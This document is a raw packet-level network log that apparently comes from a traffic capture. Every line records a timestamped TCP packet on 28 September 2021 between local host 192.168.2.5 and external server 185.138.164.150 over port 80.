Sep 28, 2021 07:38:33.003532887 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.003551960 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.003554106 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.003577948 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.003585100 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.003599882 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.003613949 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.003622055 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.003643036 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.003654003 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.003665924 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.003688097 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.003691912 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.003715038 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.003739119 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.003750086 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.003762007 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.003784895 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.003787041 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.003807068 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.003830910 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.003855944 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.003892899 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.004751921 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.004791021 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.004807949 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.004862070 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.004885912 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.005006075 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005050898 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005074978 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.005089998 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005134106 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.005141973 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005191088 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005228043 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005234003 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.005264997 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005311966 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.005331039 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005407095 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005445957 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005475044 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.005482912 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005517006 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005537987 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.005553961 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005588055 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005611897 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.005642891 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005676985 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.005692959 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.005700111 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005738020 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005773067 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005795002 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.005811930 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005845070 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005882025 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.005884886 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005935907 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.005971909 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.005986929 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.006040096 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.006063938 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.006107092 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.006149054 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.006172895 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.006186962 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.006223917 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.006242990 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.006270885 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.006308079 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.006328106 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.006344080 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.006376982 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.006395102 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.006422997 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.006470919 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.006472111 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.006508112 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.006541014 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.006561995 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.006594896 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.006649971 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.006669998 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.006711960 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.006746054 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.006769896 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.006798029 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.008570910 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.008584023 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.008634090 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.008663893 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.008688927 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.008713007 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.008713961 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.008738041 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.008764029 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.009111881 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.009150028 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.009176970 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.009185076 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.009201050 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.009226084 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.009227037 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.009251118 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.009274006 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.009298086 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.009320974 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.009346962 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.009371042 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.009394884 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.009418964 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.009443045 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.009464979 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.009634018 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.009637117 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.009639978 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.009641886 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.009644985 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.009648085 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.009866953 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.009898901 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.009959936 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.010021925 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.010052919 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.010077000 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.010102034 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.010114908 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.010124922 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.010148048 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.010166883 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.010171890 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.010195971 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.010198116 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.010222912 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.010246038 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.010247946 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.010271072 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.010296106 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.010308981 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.010351896 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.010927916 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011070967 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011102915 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011137009 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.011145115 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011172056 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011194944 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011203051 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.011218071 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011239052 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.011243105 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011270046 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011293888 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011317015 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011338949 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011357069 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.011362076 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011384964 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011420012 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011425972 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011450052 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011472940 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011488914 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.011493921 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011514902 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011537075 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011548042 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.011562109 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011585951 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011590004 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.011610031 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011614084 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.011632919 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011655092 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.011656046 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011679888 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011703014 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.011729956 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.011869907 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.017059088 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.022118092 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.036384106 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.036412001 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.036429882 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.036451101 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.036535025 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.036988020 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037018061 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037043095 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037065029 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037082911 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037102938 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037127972 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037149906 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.037153006 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037178993 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037204027 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037225008 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037240982 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037259102 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037267923 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.037275076 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037292957 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037308931 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037319899 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.037324905 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037342072 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037347078 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.037358046 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037378073 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037395000 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037405968 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.037410021 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.037452936 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.039568901 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.039604902 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.039627075 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.039649963 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.039669037 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.039675951 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.039704084 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.039729118 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.039731979 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.039752007 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.039761066 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.039777040 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.039797068 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.039800882 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.039836884 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.039863110 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.039901018 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.039905071 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.039973021 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.040076971 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040102959 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040132999 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040139914 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.040158987 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040180922 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040189028 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.040205002 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040227890 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040235996 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.040282011 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.040287018 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040298939 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040303946 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040329933 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040354013 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040361881 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.040380955 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040395021 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.040405989 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040430069 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040432930 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.040453911 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040477037 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040496111 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.040508032 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040529013 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040546894 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.040554047 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040580034 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040589094 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.040604115 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040627956 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040637016 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.040652037 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040678978 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040688992 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.040704012 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040726900 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040750027 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040755033 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.040777922 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040793896 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.040802002 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040826082 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040846109 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040848017 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.040868044 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.040894985 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.041014910 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.041098118 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041166067 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041193008 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041217089 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041234970 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041254997 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.041260004 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041285992 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041291952 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.041311979 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041316986 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.041336060 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041367054 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.041423082 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041448116 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041466951 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.041477919 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041505098 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041529894 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041542053 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.041558027 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041583061 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041591883 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.041609049 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041634083 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.041636944 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041661978 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041686058 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041695118 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.041712046 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041729927 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.041735888 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041752100 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.041759014 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041781902 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041805983 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041888952 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.041917086 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041944027 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041968107 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.041970968 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.041990995 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042000055 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.042016983 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042031050 CEST	49731	80	192.168.2.5	185.138.164.150
Sep 28, 2021 07:38:33.042040110 CEST	80	49731	185.138.164.150	192.168.2.5
Sep 28, 2021 07:38:33.042063951 CEST	80	49731	185.138.164.150	192.168.2.5
